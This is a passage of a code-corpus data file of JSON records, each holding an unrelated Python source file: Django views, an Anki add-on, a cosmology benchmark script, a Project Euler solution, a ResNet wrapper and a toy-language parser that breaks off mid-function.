testDensnetFeatureExtractor.runExtract(pictureList)\n elif method == 'cnn-vgg':\n from ImageFeatureExtract.cnn import testVGGFeatureExtractor\n from importlib import reload\n reload(testVGGFeatureExtractor)\n return testVGGFeatureExtractor.runExtract(pictureList)\n elif method == 'ae':\n from ImageFeatureExtract.ae import testAutoEncoder\n from importlib import reload\n reload(testAutoEncoder)\n return testAutoEncoder.runExtract(pictureList)\n else:\n print('no method selected!')\n \n #runCluster:运行最佳参数的聚类\n def runExtractor(self,operator=[],params=[]):\n runLog = []\n runLog.append(operator)\n if operator == 'info' or operator=='':\n self.info()\n if operator == 'usedefault':\n self.makeSureExists(self.config['EXTRACTED_FEATURE_PATH']) \n self.copyFile(self.config['RAW_ROOT']+'pretrain_data/ExtractedFeature-default.txt',\n self.config['EXTRACTED_FEATURE_PATH'])\n if operator == 'extif':\n # 获得mRNA\n pictureList = self.transcription()\n imageMatrix,imageSize = self.loadPictureData(pictureList,'cv2')\n #提取全部图像的特征\n if 'cnn' in params:\n # cnn专用\n extractedFeatures = self.extractIF(params,pictureList,imageSize)\n else:\n extractedFeatures = self.extractIF(params,imageMatrix,imageSize)\n self.writeVector(extractedFeatures,self.config['EXTRACTED_FEATURE_PATH'])#+'-'+params)\n self.DBP.updateMetaData({\"$set\":{\"imagesize\":str(imageSize[0])+'x'+str(imageSize[1]),\"ifmethod\":params,\"ifdim\":len(extractedFeatures[0])}})\n runLog.append('len extractedFeatures:%d' % len(extractedFeatures))\n\n print('\\n---------------------------runLog:----------------------------\\n',runLog)\n return runLog\n","sub_path":"MisleadingWidgetsDetective_Algo/ImageFeatureExtract/ImageFeatureExtractor.py","file_name":"ImageFeatureExtractor.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497170249","text":"import numpy as np\nimport os\n\ncosmo1 = {'name': 'cosmo1', 'Omega_m': 0.3, 'Omega_b': 0.05, 'h': 0.67, 'n_s': 0.96, 'sigma8': 0.8, 'w0': -1.0, 'wa': 0.0, 'omega_nu': 0.0}\ncosmo2 = {'name': 'cosmo2', 'Omega_m': 0.3, 'Omega_b': 0.05, 'h': 0.67, 'n_s': 0.96, 'sigma8': 0.8, 'w0': -1.0, 'wa': 0.0, 'omega_nu': 0.001}\n\ndef get_bm(cosmo, kind):\n cosmoname = cosmo['name']\n f = open(\"xstar.dat\", \"w\")\n h = cosmo['h']\n ns = cosmo['n_s']\n s8 = cosmo['sigma8']\n w0 = cosmo['w0']\n wa = cosmo['wa']\n om = cosmo['Omega_m']*h**2\n ob = cosmo['Omega_b']*h**2\n onu = cosmo['omega_nu']\n f.write(f'{om} {ob} {s8} {h} {ns} {w0} {wa} {onu} 0.0\\n')\n f.write(f'{om} {ob} {s8} {h} {ns} {w0} {wa} 
{onu} 1.0\\n')\n f.close()\n os.system(f'./P_{kind}/emu.exe')\n for i in range(2):\n os.system(f'mv EMU{i}.txt ../../{cosmoname}_MTII_{kind}_{i}.txt')\n\nget_bm(cosmo1, 'tot')\nget_bm(cosmo1, 'cb')\nget_bm(cosmo2, 'tot')\nget_bm(cosmo2, 'cb')\n","sub_path":"benchmarks/data/codes/CosmicEmuMTII/get_bms.py","file_name":"get_bms.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606543868","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import Http404\n\nfrom django.shortcuts import render, redirect\nfrom django.template.defaultfilters import slugify\n\nfrom collection.forms import HostForm\nfrom collection.models import Host\n\n\ndef index(request):\n hosts = Host.objects.all()\n return render(request, 'index.html', {\n 'hosts': hosts,\n })\n\ndef host_detail(request, slug):\n # grab the object...\n host = Host.objects.get(slug=slug)\n\n # and pass to the template\n return render(request, 'hosts/host_detail.html', {\n 'host': host,\n })\n\n@login_required\ndef edit_host(request, slug):\n # grab the object...\n host = Host.objects.get(slug=slug)\n\n # grab the current logged in user and make sure they're the owner of the host\n if host.user != request.user:\n raise Http404\n\n # set the form we're using...\n form_class = HostForm\n\n # if we're coming to this view from a submitted form, \n if request.method == 'POST':\n # grab the data from the submitted form\n form = form_class(data=request.POST, instance=host)\n\n if form.is_valid():\n # save the new data\n form.save()\n return redirect('host_detail', slug=host.slug)\n\n # otherwise just create the form\n else:\n form = form_class(instance=host)\n\n # and render the template\n return render(request, 'hosts/edit_host.html', {\n 'host': host,\n 'form': form,\n })\n\ndef create_host(request):\n form_class = HostForm\n\n # if we're coming from a submitted form, do this\n if request.method == 'POST':\n # grab the data from the submitted form and apply to the form\n form = form_class(request.POST)\n\n if form.is_valid():\n # create an instance but do not save yet\n host = form.save(commit=False)\n\n # set the additional details\n host.user = request.user\n host.slug = slugify(host.name)\n\n # save the object\n host.save()\n\n # redirect to our newly created host\n return redirect('host_detail', slug=host.slug)\n\n # otherwise just create the form\n else:\n form = form_class()\n\n return render(request, 'hosts/create_host.html', {\n 'form': form,\n })\n\ndef browse_by_name(request, initial=None):\n if initial:\n hosts = Host.objects.filter(\n name__istartswith=initial).order_by('name')\n else:\n hosts = Host.objects.all().order_by('name')\n\n return render(request, 'search/search.html', {\n 'hosts': hosts,\n 'initial': initial,\n })\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268006129","text":"# coding: utf-8\n\ndef handle_argument():\n '''handle the argument. '''\n import argparse\n\n description = 'This script is used to convert one encoding file to another encoding file.'\n epilog = \"\"\" \"\"\"\n parser = argparse.ArgumentParser(prog=\"convert_encoding\",\n description=description,\n epilog=epilog,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('infile',\n help='The input file with path, e.g. 
/data/dept_dict.csv')\n parser.add_argument('--inencode', nargs='?', default='utf-8',\n help='The input file encoding method. The default is utf-8')\n parser.add_argument('outfile',\n help='The output file with path, e.g. /data/out_dept_dict.csv')\n parser.add_argument('--outencode', nargs='?', default='utf-8',\n help='The output file encoding method. The default is utf-8')\n\n return parser\n\n\nparser = handle_argument()\nargs = parser.parse_args()\n\n\ninPath = args.infile\noutPath = args.outfile\n\ninEncode = args.inencode\noutEncode = args.outencode\n\nwith open(inPath, 'r+', encoding=inEncode, errors='ignore') as fIn:\n with open(outPath, 'w+', encoding=outEncode) as fOut:\n # for line in fIn.readlines():\n # fOut.write(line.decode(inEncode).encode(outEncode))\n fOut.writelines(fIn.readlines())\n","sub_path":"spark/scripts/convert_encoding.py","file_name":"convert_encoding.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"94140224","text":"from .dynamath import *\n\n\nclass CustomDialog(QDialog):\n\n def __init__(self, *args, **kwargs):\n super(CustomDialog, self).__init__(*args, **kwargs)\n\n self.dyna_math = DynaMathManager(self)\n\n self.setWindowTitle(\"DynaMath Addon\")\n self.setMinimumSize(500, 500)\n\n self.text_editor = QTextEdit()\n self.output_text = QTextEdit()\n self.saved_texts = ['', '', '', '']\n self.menu_triggered = 1\n\n # menu_triggered | 0 = graphic text ; 1 = question text ; 2 = answer text ; 3 = algorithm text\n\n # TOP TOOLBAR\n action_create = QAction(\"Create new algorithm\", self)\n action_create.triggered.connect(self.makeBold)\n action_edit = QAction(\"Edit existing algorithm\", self)\n action_help = QAction(\"Help\", self)\n\n toolbar = QToolBar()\n toolbar.addAction(action_create)\n toolbar.addAction(action_edit)\n toolbar.addAction(action_help)\n\n # BOTTOM TOOLBAR\n action_showGraphicText = QAction(\"Show Graphic Text\", self)\n action_editQuestionText = QAction(\"Edit Question Text\", self)\n action_editQuestionText.triggered.connect(lambda checked: self.switchMenu(1))\n action_editAnswerText = QAction(\"Edit Answer Text\", self)\n action_editAnswerText.triggered.connect(lambda checked: self.switchMenu(2))\n action_editAlgorithm = QAction(\"Edit Algorithm\", self)\n action_editAlgorithm.triggered.connect(lambda checked: self.switchMenu(3))\n action_showPreview = QAction(\"Show Preview\", self)\n action_showPreview.triggered.connect(self.showPreview)\n\n toolbar_bottom = QToolBar()\n toolbar_bottom.addAction(action_showGraphicText)\n toolbar_bottom.addAction(action_editQuestionText)\n toolbar_bottom.addAction(action_editAnswerText)\n toolbar_bottom.addAction(action_editAlgorithm)\n toolbar_bottom.addAction(action_showPreview)\n\n self.layout = QVBoxLayout()\n self.layout.addWidget(toolbar)\n self.layout.addWidget(self.text_editor)\n self.layout.addWidget(self.output_text)\n self.layout.addWidget(toolbar_bottom)\n\n self.setLayout(self.layout)\n self.show()\n # action_showPlainText.setFont(\n # FONTS\n\n #\n # Execute\n #\n def showPreview(self):\n self.saved_texts[self.menu_triggered] = self.text_editor.toPlainText()\n\n question = self.saved_texts[1]\n answer = self.saved_texts[2]\n algorithm = self.saved_texts[3]\n self.dyna_math.showPreview(question, answer, algorithm)\n #\n # OUTPUT \"CONSOLE\" HELPER FUNCTIONS\n #\n\n def setOutput(self, text):\n self.output_text.setText(text)\n\n def print(self, text):\n prevText = self.output_text.toPlainText()\n 
self.output_text.setText(prevText + text + \"\\n\")\n\n def printArr(self, arr):\n for i in arr:\n self.print(str(i))\n\n #\n # GUI FUNCTIONS\n #\n # menu_triggered | 0 = graphic text ; 1 = question text ; 2 = answer text ; 3 = algorithm text\n def switchMenu(self, menu_num):\n # saves current text in the correct location\n currentMenu = self.menu_triggered\n self.saved_texts[currentMenu] = self.text_editor.toPlainText()\n # sets text box to desired cached text\n self.text_editor.setText(self.saved_texts[menu_num])\n self.menu_triggered = menu_num\n\n def makeBold(self):\n action_called = self.sender()\n font = action_called.font()\n font.setBold(True)\n action_called.setFont(font)\n\n # function that's called when closed by dialog manager (found in qt/aqt/__init__.py) (REQUIRED BY ANKI)\n def closeWithCallback(self, *args):\n dialogs.markClosed(\"testD\")\n\n\n# About QDialog | https://doc.qt.io/qtforpython/PySide2/QtWidgets/QDialog.html#more\ndef main_func():\n d = QDialog()\n name = \"testD\"\n dialogs.register_dialog(name, CustomDialog)\n dialogs.open(name, mw)\n\n\n# create a new menu item, \"test\"\naction = QAction(\"test\", mw)\n# set it to call testFunction when it's clicked\naction.triggered.connect(main_func)\n# and add it to the tools menu\nmw.form.menuTools.addAction(action)\n\n\n\n\n\n","sub_path":"src/dynamic_math/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"8883872","text":"# coding: utf-8\n'''\nすべての桁に 1 から n が一度だけ使われている数をn桁の数がパンデジタル (pandigital) であるということにしよう\n例えば5桁の数 15234 は1から5のパンデジタルである.\n7254 は面白い性質を持っている. 39 × 186 = 7254 と書け, 掛けられる数, 掛ける数, 積が1から9のパンデジタルとなる.\n掛けられる数/掛ける数/積が1から9のパンデジタルとなるような積の総和を求めよ.\nHINT: いくつかの積は, 1通り以上の掛けられる数/掛ける数/積の組み合わせを持つが1回だけ数え上げよ.\n'''\nimport itertools\n\n\ndef main():\n # 桁数について\n # 1桁×4桁=4桁,2桁×3桁=4桁の2パターンしか存在しないことは自明\n # パンデジタル数を上から2桁を掛けられる数,3~5桁を掛ける数,下4桁を積として成立するかを考える\n numlist = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n panlist = list(itertools.permutations(numlist))\n for n in range(len(panlist)):\n pl = panlist[n]\n pan = 0\n for i in range(9):\n pan += pl[i]*(10**(8-i))\n panlist[n] = pan\n finlist = []\n for pan in panlist:\n # 1桁×4桁=4桁\n pro = pan % 10000\n b = (pan//10000) % 10000\n a = pan // 100000000\n if a*b == pro:\n print(a, b, pro)\n finlist.append(pro)\n # 2桁×3桁=4桁\n pro = pan % 10000\n b = (pan//10000) % 1000\n a = pan // 10000000\n if a*b == pro:\n print(a, b, pro)\n finlist.append(pro)\n finlist_uniq = list(set(finlist))\n s = 0\n for f in finlist_uniq:\n s += f\n print(s)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Practice/ProjectEuler/Problem32.py","file_name":"Problem32.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483835366","text":"import sys\nsys.stdin = open('input.txt','r')\nN= int(input())\nh= list(map(int,input().split()))+[0]\nstart = 0 #오르막 구간의 시작 인덱스\nstatus = 0 #오르막 구간1, 나머지 0 (오르막길이의 상태를 나타냄)\nmaxV=0\nfor i in range(N): #오른쪽과 비교할 자리i\n if(status==0 and h[i]=h[i+1]): #i에서 오르막이 끝나면\n diff = h[i] - h[start] # 오르막 구간의 높이차\n if(maxV 0 else 0: page_number - 1]\n\n # 如果最左边的页码比第二页页码大\n if left[0] > 2:\n left_has_more = True\n\n if left[0] > 1:\n first = True\n\n else:\n # 用户请求的是中间的页码\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0: page_number - 1]\n right = page_range[page_number:page_number + 2]\n\n # 是否需要显示最后一页和最后一页前的省略号\n if right[-1] < total_pages - 
1:\n right_has_more = True\n if right[-1] < total_pages:\n last = True\n\n # 左边\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n\n # context要更新的分页导航条的数据\n data = {\n 'left': left,\n 'right': right,\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'first': first,\n 'last': last,\n }\n\n return data\n\n\n# 简短写法\n# @staticmethod\n# def pagination_data(paginator, page, is_paginated):\n# if not is_paginated:\n# return {}\n# left = []\n# right = []\n# left_has_more = False\n# right_has_more = False\n# first = False\n# last = False\n#\n# page_number = page.number\n# total_pages = paginator.num_pages\n# page_range = paginator.page_range\n#\n# left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:\n# (page_number - 1) if (page_number - 1) > 0 else 0]\n# right = page_range[page_number:page_number + 2]\n#\n# if right:\n# if right[-1] < total_pages:\n# last = True\n# if right[-1] < total_pages - 1:\n# right_has_more = True\n# if left:\n# if left[0] > 1:\n# first = True\n# if left[0] > 2:\n# left_has_more = True\n#\n# data = {'left': left,\n# 'right': right,\n# 'left_has_more': left_has_more,\n# 'right_has_more': right_has_more,\n# 'first': first,\n# 'last': last, }\n#\n# return data\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog/detail.html'\n context_object_name = 'post'\n\n # get_object, get_context_data都是辅助方法,都会在get中调用\n def get(self, request, *args, **kwargs):\n \"\"\"get方法最终会返回一个HTTPResponse\"\"\"\n response = super().get(request, *args, **kwargs)\n\n # 文章阅读量+1。这里的object就是get_object()返回的object, 就是文章post的一个实例\n self.object.increase_page_view()\n\n return response\n\n def get_object(self, queryset=None):\n \"\"\"覆写 get_object 方法的目的是因为需要对post的body值进行markdown渲染\"\"\"\n post = super().get_object(queryset=None)\n md = markdown.Markdown(extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n # 'markdown.extensions.toc', 这个内置的拓展的锚点URL不美观(#_1,当有中文时就会简单的在#后加上_x)\n TocExtension(slugify=slugify)\n ])\n\n post.body = md.convert(post.body)\n post.toc = md.toc\n\n return post\n\n def get_context_data(self, **kwargs):\n \"\"\"传递除context_object_name以外的变量到模板\"\"\"\n context = super().get_context_data(**kwargs)\n form = CommentForm()\n comment_list = self.object.comment_set.all()\n context.update({\n 'form': form,\n 'comment_list': comment_list,\n })\n return context\n\n\nclass ArchivesView(IndexView):\n def get_queryset(self):\n # 在类视图中,从 URL 捕获的命名组参数值保存在实例的 kwargs 属性(是一个字典)里,非命名组参数值保存在实例的 args 属性(是一个元组)里。原理看ContextMixin。\n year = self.kwargs.get('year')\n month = self.kwargs.get('month')\n return super().get_queryset().filter(created_time__year=year, created_time__month=month)\n\n\nclass CategoryView(IndexView):\n def get_queryset(self):\n cate = get_object_or_404(Category, pk=self.kwargs.get('pk'))\n # 因为父类IndexView绑定了model = Post, 所以get_queryset对Post操作\n return super().get_queryset().filter(category=cate)\n\n\nclass TagView(IndexView):\n def get_queryset(self):\n tag = get_object_or_404(Tag, pk=self.kwargs.get('pk'))\n return super().get_queryset().filter(tags=tag)\n\n\n# def search(request):\n# \"\"\"简单的搜索功能\"\"\"\n# q = request.GET.get('q')\n# error_msg = ''\n#\n# if not q:\n# error_msg = '请输入关键词'\n# return render(request, 'blog/index.html', {'error_msg': error_msg})\n#\n# # Q提供了复杂的查询逻辑\n# post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n# return render(request, 'blog/index.html', {'error_msg': error_msg,\n# 'post_list': post_list})\n\nclass 
SearchView(IndexView):\n def get(self, request, *args, **kwargs):\n \"\"\"get方法最终会返回一个HTTPResponse\"\"\"\n q = request.GET.get('q')\n error_msg = ''\n\n if not q:\n error_msg = '请输入关键词'\n return render(request, 'blog/index.html', {'error_msg': error_msg})\n\n # Q提供了复杂的查询逻辑\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n return render(request, 'blog/index.html', {'error_msg': error_msg,\n 'post_list': post_list})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"324472124","text":"# Copyright 2021 MosaicML. All Rights Reserved.\n\nfrom typing import List, Optional\n\nfrom composer.models.base import MosaicClassifier\nfrom composer.models.model_hparams import Initializer\nfrom composer.models.resnets import ImageNet_ResNet\n\n\nclass ResNet18(MosaicClassifier):\n \"\"\"A ResNet-18 model extending :class:`MosaicClassifier`.\n\n See this `paper `_ for details\n on the residual network architecture.\n\n Args:\n num_classes (int): The number of classes for the model.\n initializers (List[Initializer], optional): Initializers\n for the model. ``None`` for no initialization.\n (default: ``None``)\n \"\"\"\n\n def __init__(\n self,\n num_classes: int,\n initializers: Optional[List[Initializer]] = None,\n ) -> None:\n if initializers is None:\n initializers = []\n\n model = ImageNet_ResNet.get_model_from_name(\n \"imagenet_resnet_18\",\n initializers,\n num_classes,\n )\n super().__init__(module=model)\n","sub_path":"composer/models/resnet18/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"129320727","text":"from new_lexer import *\n# Класс узла дерева\n\n# Класс идентификатора\nclass SID:\n def __init__(self, level, vtype, value, size=0, fargs=None):\n self.value = value\n self.vtype = vtype\n self.level = level\n self.size = size\n self.elems = [value for _ in range(size)]\n self.fargs = fargs\n\n\n# Класс узла дерева синтаксиса\nclass Node:\n def __init__(self, kind, value=None, name='', op1=None, op2=None, op3=None, level=0):\n self.kind = kind\n self.value = value\n self.op1 = op1\n self.op2 = op2\n self.op3 = op3\n self.name = name\n self.level = level\n\n# Класс парсера\nclass Parser:\n # Конструктор\n def __init__(self, lexer):\n self.lexer = lexer # лексер\n self.level = 0 # вложенность\n self.levels = 1 # количество уровней всего\n self.MAXLEVELS = 10\n self.MAXARR = 256\n self.MAXSTR = 256\n self.table = [{} for _ in range(self.MAXLEVELS)] # таблица символов\n self.funcount = 0 # сколько функций\n\n\n # Ошибка\n def error(self, msg):\n print('Parser error at %d:%d : %s' % (self.lexer.lin_read + 1, self.lexer.chr_read, msg))\n sys.exit(1)\n\n\n # Терм\n def term(self):\n if self.lexer.sym in (Lexer.ID, Lexer.NUM, Lexer.STR):\n n = Node(self.lexer.sym, self.lexer.value, level=self.level)\n if self.lexer.sym == Lexer.STR: # строка - это что-то особое\n n = Node(self.lexer.sym, self.lexer.value, level=self.level)\n self.table[self.level][self.lexer.value] = SID(self.level, 1, self.lexer.value, len(self.lexer.value))\n\n prev_sym = self.lexer.sym\n\n\n if self.lexer.sym == Lexer.ID:\n n = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level)\n prev_name = self.lexer.ident\n self.lexer.next_tok()\n\n # ПРОВЕРКА НА ИНДЕКСЫ,\n if self.lexer.sym == Lexer.LSCB: # 
[\n if prev_sym != Lexer.ID:\n self.error('string or array expected')\n t = self.table[self.level].get(prev_name)\n if t == None:\n t = self.table[0].get(prev_name) # глобально\n if t == None:\n self.error('index error')\n elif t.vtype not in (1, 2): # не строка и не массив\n self.error('string or array expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.ID, Lexer.NUM): # должно быть число или переменная\n self.error('index expected')\n if self.lexer.sym == Lexer.NUM:\n n.op1 = Node(self.lexer.sym, self.lexer.value, level=self.level)\n elif self.lexer.sym == Lexer.ID:\n n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RSCB: # ]\n self.error('\"]\" expected')\n self.lexer.next_tok()\n\n # ФУНКЦИЯ И СКОБОЧКИ\n elif self.lexer.sym == Lexer.LPAR:\n t = self.table[0].get(n.name)\n if t == None:\n self.error('no such function: \"%s\"' % n.name)\n if t.fargs == None:\n self.error('function expected')\n self.lexer.next_tok()\n longname = \"\"\n pcounter = 0\n if self.lexer.sym in (Lexer.ID, Lexer.NUM): # есть параметр\n if self.lexer.sym == Lexer.ID:\n pident = self.lexer.ident # ID пепвой переменной\n else:\n pident = self.lexer.value # значение числа\n self.lexer.next_tok()\n longname += \"%s \" % pident\n pcounter = 1\n if self.lexer.sym == Lexer.COMMA: # если запятая\n self.lexer.next_tok() # следом доджна быть еще переменная\n while (True):\n if self.lexer.sym == Lexer.ID:\n pident = self.lexer.ident\n else:\n pident = self.lexer.value\n longname += \"%s \" % pident\n pcounter += 1\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если опяь запятая\n self.lexer.next_tok()\n else:\n break\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n if pcounter != len(t.fargs):\n self.error('wrong number of parameters: expected %s, got %s' % (len(t.fargs), pcounter))\n n.op2 = Node(Lexer.EMPTY, name = longname) # для того чтобы функция знала имена своих параметров\n\n # \\ПРОВЕРКА\n\n return n\n else:\n return self.paren_expr()\n\n # Сумма\n def summa(self):\n n = self.term()\n while self.lexer.sym in (Lexer.PLUS, Lexer.MINUS, Lexer.MUL, Lexer.DIV): # арифметические операции\n kind = self.lexer.sym\n if n.op2 == None or kind in (Lexer.PLUS, Lexer.MINUS): # с низким приоритетом\n self.lexer.next_tok()\n n = Node(kind, op1=n, op2=self.term(), level=self.level)\n else: # с высоким приоритетом\n self.lexer.next_tok()\n n1 = Node(kind, op1=n.op2, op2=self.term(), level=self.level)\n n.op2 = n1\n\n return n\n\n # Проверка на знаки сравнения и вызов арифметики\n def test(self):\n n = self.summa()\n if self.lexer.sym in (Lexer.LESS, Lexer.GRTR, Lexer.EQUAL):\n kind = self.lexer.sym\n\n self.lexer.next_tok()\n n = Node(kind, op1=n, op2=self.summa(), level=self.level)\n\n return n\n\n # Выражение\n def expr(self):\n if self.lexer.sym != Lexer.ID:\n return self.test()\n\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся считать переменную, которой нет\n if self.level > 0: # ищем еще и в глобальных\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n else:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n n = self.test()\n if n.kind == Lexer.ID:\n if self.lexer.sym == Lexer.SET:\n self.lexer.next_tok()\n n = Node(Lexer.SET, op1=n, op2=self.expr(), level=self.level)\n return n\n\n # Скобки\n def paren_expr(self):\n if self.lexer.sym 
!= Lexer.LPAR:\n self.error('\"(\" expected')\n self.lexer.next_tok()\n n = self.expr()\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n return n\n\n # Выражение главное\n def statement(self):\n if self.level != 0: # внутри функций можно и переменные объявлять\n while (True):\n if self.lexer.sym == Lexer.VAR: # объявление переменной\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # должна быть переменная\n self.error('variable expected!')\n\n ident = self.lexer.ident\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # должно быть двоеточие\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR): # тип переменной\n self.error('variable type expected')\n\n self.makevar(ident, self.level)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON: # и вишенка на торте\n self.error('\";\" expected')\n self.lexer.next_tok()\n else:\n break\n\n if self.lexer.sym == Lexer.IF: # обработка IF\n n = Node(Lexer.IF1, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.paren_expr()\n if self.lexer.sym != Lexer.THEN: # THEN\n self.error('\"then\" expected')\n self.lexer.next_tok()\n n.op2 = self.statement()\n if self.lexer.sym == Lexer.ELSE: # ELSE\n n.kind = Lexer.IF2\n self.lexer.next_tok()\n n.op3 = self.statement()\n elif self.lexer.sym == Lexer.WHILE: # обработка WHILE\n n = Node(Lexer.WHILE, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.paren_expr()\n n.op2 = self.statement()\n elif self.lexer.sym == Lexer.DO: # обработка DO\n n = Node(Lexer.DO, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.statement()\n if self.lexer.sym != Lexer.WHILE:\n self.error('\"while\" expected')\n self.lexer.next_tok()\n n.op2 = self.paren_expr()\n if self.lexer.sym != Lexer.SEMICOLON: # точка с запятой\n self.error('\";\" expected')\n elif self.lexer.sym == Lexer.SEMICOLON:\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n elif self.lexer.sym == Lexer.BEGIN: # обработка начала-конца\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n\n while self.lexer.sym != Lexer.END:\n n = Node(Lexer.SEQ, op1=n, op2=self.statement(), level=self.level)\n self.lexer.next_tok()\n\n elif self.lexer.sym == Lexer.READ: # считывание переменной\n n = Node(Lexer.READ, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR: # должны быть скобки\n self.error('\"(\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # если пытаемся считать НЕ переменную\n self.error('variable expected')\n n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level) # создаем узел\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся считать переменную, которой нет\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RPAR: # должны быть скобки\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n\n elif self.lexer.sym == Lexer.WRITE: # вывод на экран\n n = Node(Lexer.WRITE, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR: # должны быть скобки\n self.error('\"(\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.ID, Lexer.STR): # вывести можно: строку, переменную\n self.error('string or variable expected')\n 
n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level) # создаем узел\n\n if self.lexer.sym == Lexer.ID: # если выводим переменную\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся вывести переменную, которой нет\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n if self.lexer.sym == Lexer.STR:\n n.op1 = Node(self.lexer.sym, self.lexer.value, level=self.level)\n self.table[self.level][self.lexer.value] = SID(self.level, 1, self.lexer.value, len(self.lexer.value))\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RPAR: # должны быть скобки\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n else:\n n = Node(Lexer.EXPR, op1=self.expr(), level=self.level)\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n self.lexer.next_tok()\n return n\n\n # ОБЪЯВЛЕНИЕ ПЕРЕМЕННЫХ\n def makevar(self, ident, lev, argcount=-1, params=[]):\n # тип переменной это 0 - int, 1 - str, 2 - arr\n vtype = 0\n if self.lexer.sym == Lexer.STR: # если строка\n vtype = 1\n elif self.lexer.sym == Lexer.ARR: # если массив\n vtype = 2\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LSCB: # если массив без размера\n self.error('\"[\" expected') # то он не нужен\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.NUM: # если размер массива не число\n self.error('number expected') # он тоже не нужен\n if self.lexer.value < 1 or self.lexer.value > self.MAXARR: # размеры массива\n self.error('incorrect array size')\n asize = self.lexer.value\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RSCB: # если массив без размера\n self.error('\"]\" expected') # то он не нужен\n\n if self.table[lev].get(ident) == None:\n if vtype == 0:\n if argcount != -1: # если функция\n self.table[lev][ident] = SID(lev, vtype, value=self.level, size=argcount, fargs=params)\n else:\n self.table[lev][ident] = SID(lev, vtype, value=0)\n elif vtype == 1:\n self.table[lev][ident] = SID(lev, vtype, 0, self.MAXSTR) # создаем строку\n elif vtype == 2:\n self.table[lev][ident] = SID(lev, vtype, 0, asize) # создаем массив\n else:\n errstr = \"variable '%s' already exists\" % ident\n self.error(errstr)\n\n # парсинг области, где есть функции и объявление переменныъ\n def compound_statement(self):\n n = Node(Lexer.EMPTY)\n while self.lexer.sym != Lexer.EOF:\n\n if self.lexer.sym == Lexer.VAR: # объявление переменной\n n = Node(Lexer.EMPTY, level=self.level)\n 